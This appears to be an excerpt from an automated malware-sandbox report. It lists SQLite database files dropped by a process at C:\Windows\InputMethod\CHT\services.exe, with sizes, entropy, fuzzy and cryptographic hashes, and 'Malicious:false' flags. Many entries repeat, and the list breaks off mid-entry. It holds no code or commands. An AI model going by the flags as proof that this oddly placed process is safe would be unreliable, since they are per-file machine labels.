                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):98304
                                                              Entropy (8bit):0.08235737944063153
                                                              Encrypted:false
                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
